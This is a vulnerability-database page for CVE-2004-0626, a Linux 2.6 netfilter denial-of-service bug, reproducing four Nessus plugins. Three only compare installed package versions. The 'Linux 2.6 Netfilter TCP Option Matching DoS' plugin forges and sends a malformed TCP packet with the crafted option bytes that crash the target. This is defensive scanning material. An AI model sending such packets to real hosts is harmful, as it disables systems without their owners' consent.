Vulnerabilities > CVE-2004-0626

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
conectiva
gentoo
linux
suse
nessus

Summary

The tcp_find_option function of the netfilter subsystem in Linux kernel 2.6, when using iptables and TCP options rules, allows remote attackers to cause a denial of service (CPU consumption by infinite loop) via a large option length that produces a negative integer after a casting operation to the char type.

Nessus

  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2004-202.NASL
    descriptionThis security update fixes the remote DoS possibility identified and fixed by Adam Osuchowski and Tomasz Dubinski in the netfilter code of the 2.6 kernel. Note that this remote DoS can only be triggered when using the rarely used
    last seen2020-06-01
    modified2020-06-02
    plugin id13733
    published2004-07-23
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/13733
    titleFedora Core 2 : kernel-2.6.6-1.435.2.1 (2004-202)
    code
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Fedora Security Advisory 2004-202.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(13733);
      script_version ("1.14");
      script_cvs_date("Date: 2019/08/02 13:32:23");
    
      script_cve_id("CVE-2004-0626");
      script_xref(name:"FEDORA", value:"2004-202");
    
      script_name(english:"Fedora Core 2 : kernel-2.6.6-1.435.2.1 (2004-202)");
      script_summary(english:"Checks rpm output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Fedora Core host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "This security update fixes the remote DoS possibility identified and
    fixed by Adam Osuchowski and Tomasz Dubinski in the netfilter code of
    the 2.6 kernel. Note that this remote DoS can only be triggered when
    using the rarely used '-p tcp --tcp-option' options in the netfilter
    firewall subsystem. Fedora Core 2 systems are not vulnerable unless
    the administrator manually configured this rarely used option.
    
    For more information see
    http://www.securityfocus.com/archive/1/367615/2004-06-27/2004-07-03/0
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Fedora security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.securityfocus.com/archive/1/367615/2004-06-27/2004-07-03/0"
      );
      # https://lists.fedoraproject.org/pipermail/announce/2004-June/000201.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?dc0ffc89"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel-smp");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel-sourcecode");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:2");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2004/06/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/23");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
      script_family(english:"Fedora Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
    os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
    os_ver = os_ver[1];
    if (! ereg(pattern:"^2([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 2.x", "Fedora " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
    
    flag = 0;
    if (rpm_check(release:"FC2", reference:"kernel-2.6.6-1.435.2.1")) flag++;
    if (rpm_check(release:"FC2", reference:"kernel-debuginfo-2.6.6-1.435.2.1")) flag++;
    if (rpm_check(release:"FC2", reference:"kernel-doc-2.6.6-1.435.2.1")) flag++;
    if (rpm_check(release:"FC2", reference:"kernel-smp-2.6.6-1.435.2.1")) flag++;
    if (rpm_check(release:"FC2", reference:"kernel-sourcecode-2.6.6-1.435.2.1")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "kernel / kernel-debuginfo / kernel-doc / kernel-smp / etc");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SA_2004_020.NASL
    descriptionThe remote host is missing the patch for the advisory SUSE-SA:2004:020 (kernel). Multiple security vulnerabilities are being addressed with this security update of the Linux kernel. Kernel memory access vulnerabilities are fixed in the e1000, decnet, acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These vulnerabilities can lead to kernel memory read access, write access and local denial of service conditions, resulting in access to the root account for an attacker with a local account on the affected system. Missing Discretionary Access Control (DAC) checks in the chown(2) system call allow an attacker with a local account to change the group ownership of arbitrary files, which leads to root privileges on affected systems. It is specific to kernel version 2.6 based systems such as the SUSE Linux 9.1 product, that only local shell access is needed to exploit this vulnerability. An interesting variant of the missing checks is that the ownership of files in the /proc filesystem can be altered, while the changed ownership still does not allow the files to be accessed as a non-root user for to be able to exploit the vulnerability. Systems that are based on a version 2.4 kernel are not vulnerable to the /proc weakness, and exploitation of the weakness requires the use of the kernel NFS server (knfsd). If the knfsd NFS server is not activated (it is off by default), the vulnerability is not exposed. These issues related to the chown(2) system call have been discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX. The only network-related vulnerability fixed with the kernel updates that are subject to this announcement affect the SUSE Linux 9.1 distribution only, as it is based on a 2.6 kernel. Found and reported to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability allows a remote attacker to send a specially crafted TCP packet to a vulnerable system, causing that system to stall if it makes use of TCP option matching netfilter rules. In some rare configurations of the SUSE Linux 9.1 distribution, some users have experienced stalling systems during system startup. These problems are fixed with this kernel update.
    last seen2020-06-01
    modified2020-06-02
    plugin id13836
    published2004-07-25
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/13836
    titleSUSE-SA:2004:020: kernel
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:020
    #
    
    
    if ( ! defined_func("bn_random") ) exit(0);
    
    include("compat.inc");
    
    if(description)
    {
     script_id(13836);
     script_bugtraq_id(10352, 10566, 10779);
     script_version ("1.17");
     script_cve_id("CVE-2004-0495", "CVE-2004-0496", "CVE-2004-0497", "CVE-2004-0535", "CVE-2004-0626");
     
     name["english"] = "SUSE-SA:2004:020: kernel";
     
    
     script_name(english:name["english"]);
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote host is missing a vendor-supplied security patch" );
     script_set_attribute(attribute:"description", value:
    "The remote host is missing the patch for the advisory SUSE-SA:2004:020 (kernel).
    
    
    Multiple security vulnerabilities are being addressed with this security
    update of the Linux kernel.
    
    Kernel memory access vulnerabilities are fixed in the e1000, decnet, 
    acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These 
    vulnerabilities can lead to kernel memory read access, write access 
    and local denial of service conditions, resulting in access to the 
    root account for an attacker with a local account on the affected 
    system.
    
    Missing Discretionary Access Control (DAC) checks in the chown(2) system
    call allow an attacker with a local account to change the group
    ownership of arbitrary files, which leads to root privileges on affected
    systems. It is specific to kernel version 2.6 based systems such as 
    the SUSE Linux 9.1 product, that only local shell access is needed to 
    exploit this vulnerability. An interesting variant of the missing 
    checks is that the ownership of files in the /proc filesystem can be 
    altered, while the changed ownership still does not allow the files to 
    be accessed as a non-root user for to be able to exploit the 
    vulnerability. Systems that are based on a version 2.4 kernel are not 
    vulnerable to the /proc weakness, and exploitation of the weakness 
    requires the use of the kernel NFS server (knfsd). If the knfsd NFS 
    server is not activated (it is off by default), the vulnerability is 
    not exposed. These issues related to the chown(2) system call have been 
    discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX.
    
    The only network-related vulnerability fixed with the kernel updates
    that are subject to this announcement affect the SUSE Linux 9.1 
    distribution only, as it is based on a 2.6 kernel. Found and reported 
    to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability 
    allows a remote attacker to send a specially crafted TCP packet to a 
    vulnerable system, causing that system to stall if it makes use of 
    TCP option matching netfilter rules.
    
    In some rare configurations of the SUSE Linux 9.1 distribution, some 
    users have experienced stalling systems during system startup. These 
    problems are fixed with this kernel update." );
     script_set_attribute(attribute:"solution", value:
    "http://www.suse.de/security/2004_20_kernel.html" );
     script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
     script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"exploited_by_malware", value:"true");
    
    
    
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2004/07/25");
     script_cvs_date("Date: 2019/10/25 13:36:27");
    
     script_end_attributes();
    
     
     summary["english"] = "Check for the version of the kernel package";
     script_summary(english:summary["english"]);
     
     script_category(ACT_GATHER_INFO);
     
     script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
     family["english"] = "SuSE Local Security Checks";
     script_family(english:family["english"]);
     
     script_dependencies("ssh_get_info.nasl");
     script_require_keys("Host/SuSE/rpm-list");
     exit(0);
    }
    
    include("rpm.inc");
    if ( rpm_check( reference:"k_deflt-2.4.18-303", release:"SUSE8.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_smp-2.4.18-303", release:"SUSE8.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_psmp-2.4.18-303", release:"SUSE8.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_i386-2.4.18-303", release:"SUSE8.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-source-2.4.18.SuSE-303", release:"SUSE8.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_deflt-2.4.21-231", release:"SUSE8.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_athlon-2.4.21-231", release:"SUSE8.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_smp-2.4.21-231", release:"SUSE8.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_psmp-2.4.21-231", release:"SUSE8.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-source-2.4.21-231", release:"SUSE8.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_deflt-2.4.20-115", release:"SUSE8.2") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_athlon-2.4.20-115", release:"SUSE8.2") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_smp-2.4.20-115", release:"SUSE8.2") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_psmp-2.4.20-115", release:"SUSE8.2") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-source-2.4.20.SuSE-115", release:"SUSE8.2") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_deflt-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_athlon-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_smp-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_smp4G-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"k_um-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-source-2.4.21-231", release:"SUSE9.0") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-default-2.6.5-7.95", release:"SUSE9.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-smp-2.6.5-7.95", release:"SUSE9.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-bigsmp-2.6.5-7.95", release:"SUSE9.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-bigsmp-2.6.5-7.95", release:"SUSE9.1") )
    {
     security_hole(0);
     exit(0);
    }
    if ( rpm_check( reference:"kernel-source-2.6.5-7.95", release:"SUSE9.1") )
    {
     security_hole(0);
     exit(0);
    }
    if (rpm_exists(rpm:"kernel-", release:"SUSE8.0")
     || rpm_exists(rpm:"kernel-", release:"SUSE8.1")
     || rpm_exists(rpm:"kernel-", release:"SUSE8.2")
     || rpm_exists(rpm:"kernel-", release:"SUSE9.0")
     || rpm_exists(rpm:"kernel-", release:"SUSE9.1") )
    {
     set_kb_item(name:"CVE-2004-0495", value:TRUE);
     set_kb_item(name:"CVE-2004-0496", value:TRUE);
     set_kb_item(name:"CVE-2004-0497", value:TRUE);
     set_kb_item(name:"CVE-2004-0535", value:TRUE);
     set_kb_item(name:"CVE-2004-0626", value:TRUE);
    }
    
  • NASL familyDenial of Service
    NASL idLINUX26_TCPOPT_DOS.NASL
    descriptionIt was possible to crash the remote host by sending a specially malformed TCP/IP packet with invalid TCP options. Only version 2.6 of the Linux kernel is known to be affected by this problem. An attacker may use this flaw to disable this host remotely.
    last seen2020-06-01
    modified2020-06-02
    plugin id12296
    published2004-07-01
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/12296
    titleLinux 2.6 Netfilter TCP Option Matching DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    #
    # Ref:
    # From: Adam Osuchowski <adwol-AT-polsl.gliwice.pl>
    # To: bugtraq-AT-securityfocus.com
    # Subject: Remote DoS vulnerability in Linux kernel 2.6.x
    # Date: Wed, 30 Jun 2004 12:57:17 +0200
    #
    
    include("compat.inc");
    
    if (description)
    {
     script_id(12296);
     script_version("1.22");
     script_cvs_date("Date: 2019/03/06 18:38:55");
    
     script_cve_id("CVE-2004-0626");
     script_bugtraq_id(10634);
    
     script_name(english:"Linux 2.6 Netfilter TCP Option Matching DoS");
     script_summary(english:"Crashes the remote host");
    
     script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
     script_set_attribute(attribute:"description", value:
    "It was possible to crash the remote host by sending a specially
    malformed TCP/IP packet with invalid TCP options. Only version 2.6 of
    the Linux kernel is known to be affected by this problem. An attacker
    may use this flaw to disable this host remotely.");
     script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/367615/30/0/threaded");
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ba1bace");
     script_set_attribute(attribute:"solution", value:"Upgrade to Linux 2.6.8 or later.");
     script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:C");
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"false");
    
     script_set_attribute(attribute:"vuln_publication_date", value:"2004/06/30");
     script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/01");
    
     script_set_attribute(attribute:"potential_vulnerability", value:"true");
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_set_attribute(attribute:"cpe", value:"cpe:/o:linux:kernel");
     script_end_attributes();
    
     script_category(ACT_KILL_HOST);
     script_family(english:"Denial of Service");
     script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
    
     script_require_keys("Settings/ParanoidReport");
    
     exit(0);
    }
    
    
    include("audit.inc");
    include('global_settings.inc');
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    if ( TARGET_IS_IPV6 ) exit(0);
    if ( islocalhost() ) exit(0);
    
    
    port = get_host_open_port();
    if ( ! port ) port = 22;
    
    ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0,ip_off:0,ip_len:20,
                             ip_p:IPPROTO_TCP, ip_id:rand() % 65535, ip_ttl:0x40,
                             ip_src:compat::this_host());
    
    
    tcpip = forge_tcp_packet(    ip       : ip,
                                 th_sport : rand() % 64000 + 1024,
                                 th_dport : port,
                                 th_flags : 0,
                                 th_seq   : rand() % 65535,
                                 th_ack   : 0,
                                 th_x2    : 0,
                                 th_off   : 7,
                                 th_win   : 512,
                                 th_urp   : 0,
                                 data     : raw_string(0x02, 0x04, 0x05, 0xb4, 0x01, 0x01, 0x04, 0xfd) );
    
    
    start_denial();
    for ( i = 0 ; i < 5 ; i ++ ) send_packet ( tcpip, pcap_active:FALSE ) ;
    
    alive = end_denial();
    if ( ! alive )
    {
     security_warning(0);
     set_kb_item(name:"Host/dead", value:TRUE);
    }
    
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-200407-12.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-200407-12 (Linux Kernel: Remote DoS vulnerability with IPTables TCP Handling) An attacker can utilize an erroneous data type in the IPTables TCP option handling code, which lies in an iterator. By making a TCP packet with a header length larger than 127 bytes, a negative integer would be implied in the iterator. Impact : By sending one malformed packet, the kernel could get stuck in a loop, consuming all of the CPU resources and rendering the machine useless, causing a Denial of Service. This vulnerability requires no local access. Workaround : If users do not use the netfilter functionality or do not use any ``--tcp-option
    last seen2020-06-01
    modified2020-06-02
    plugin id14545
    published2004-08-30
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/14545
    titleGLSA-200407-12 : Linux Kernel: Remote DoS vulnerability with IPTables TCP Handling
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 200407-12.
    #
    # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(14545);
      script_version("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:41");
    
      script_cve_id("CVE-2004-0626");
      script_xref(name:"GLSA", value:"200407-12");
    
      script_name(english:"GLSA-200407-12 : Linux Kernel: Remote DoS vulnerability with IPTables TCP Handling");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-200407-12
    (Linux Kernel: Remote DoS vulnerability with IPTables TCP Handling)
    
        An attacker can utilize an erroneous data type in the IPTables TCP option
        handling code, which lies in an iterator. By making a TCP packet with a
        header length larger than 127 bytes, a negative integer would be implied in
        the iterator.
      
    Impact :
    
        By sending one malformed packet, the kernel could get stuck in a loop,
        consuming all of the CPU resources and rendering the machine useless,
        causing a Denial of Service. This vulnerability requires no local access.
      
    Workaround :
    
        If users do not use the netfilter functionality or do not use any
        ``--tcp-option'' rules they are not vulnerable to this exploit. Users that
        are may remove netfilter support from their kernel or may remove any
        ``--tcp-option'' rules they might be using. However, all users are urged to
        upgrade their kernels to patched versions."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200407-12"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Users are encouraged to upgrade to the latest available sources for their
        system:
        # emerge sync
        # emerge -pv your-favorite-sources
        # emerge your-favorite-sources
        # # Follow usual procedure for compiling and installing a kernel.
        # # If you use genkernel, run genkernel as you would do normally."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:aa-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:ck-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:development-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:gentoo-dev-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:hardened-dev-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:hppa-dev-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mips-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mm-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:pegasos-dev-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:rsbac-dev-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:uclinux-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:usermode-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:win4lin-sources");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:xbox-sources");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2004/07/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/30");
      script_set_attribute(attribute:"vuln_publication_date", value:"2004/06/30");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"sys-kernel/hppa-dev-sources", unaffected:make_list("ge 2.6.7_p1-r1"), vulnerable:make_list("lt 2.6.7_p1-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/development-sources", unaffected:make_list("ge 2.6.8"), vulnerable:make_list("lt 2.6.8"))) flag++;
    if (qpkg_check(package:"sys-kernel/xbox-sources", unaffected:make_list("ge 2.6.7-r1", "lt 2.6"), vulnerable:make_list("lt 2.6.7-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/hardened-dev-sources", unaffected:make_list("ge 2.6.7-r1"), vulnerable:make_list("lt 2.6.7-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/gentoo-dev-sources", unaffected:make_list("ge 2.6.7-r7"), vulnerable:make_list("lt 2.6.7-r7"))) flag++;
    if (qpkg_check(package:"sys-kernel/mips-sources", unaffected:make_list("ge 2.6.4-r4", "lt 2.6"), vulnerable:make_list("lt 2.6.4-r4"))) flag++;
    if (qpkg_check(package:"sys-kernel/uclinux-sources", unaffected:make_list("ge 2.6.7_p0-r1", "lt 2.6"), vulnerable:make_list("lt 2.6.7_p0"))) flag++;
    if (qpkg_check(package:"sys-kernel/aa-sources", unaffected:make_list("ge 2.6.5-r5", "lt 2.6"), vulnerable:make_list("lt 2.6.5-r5"))) flag++;
    if (qpkg_check(package:"sys-kernel/pegasos-dev-sources", unaffected:make_list("ge 2.6.7-r1"), vulnerable:make_list("lt 2.6.7-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/rsbac-dev-sources", unaffected:make_list("ge 2.6.7-r1"), vulnerable:make_list("lt 2.6.7-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/usermode-sources", unaffected:make_list("ge 2.6.6-r2", "lt 2.6"), vulnerable:make_list("lt 2.6.6-r2"))) flag++;
    if (qpkg_check(package:"sys-kernel/ck-sources", unaffected:make_list("ge 2.6.7-r2", "lt 2.6"), vulnerable:make_list("lt 2.6.7-r2"))) flag++;
    if (qpkg_check(package:"sys-kernel/win4lin-sources", unaffected:make_list("ge 2.6.7-r1", "lt 2.6"), vulnerable:make_list("lt 2.6.7-r1"))) flag++;
    if (qpkg_check(package:"sys-kernel/mm-sources", unaffected:make_list("ge 2.6.7-r4", "lt 2.6"), vulnerable:make_list("lt 2.6.7-r4"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Linux Kernel");
    }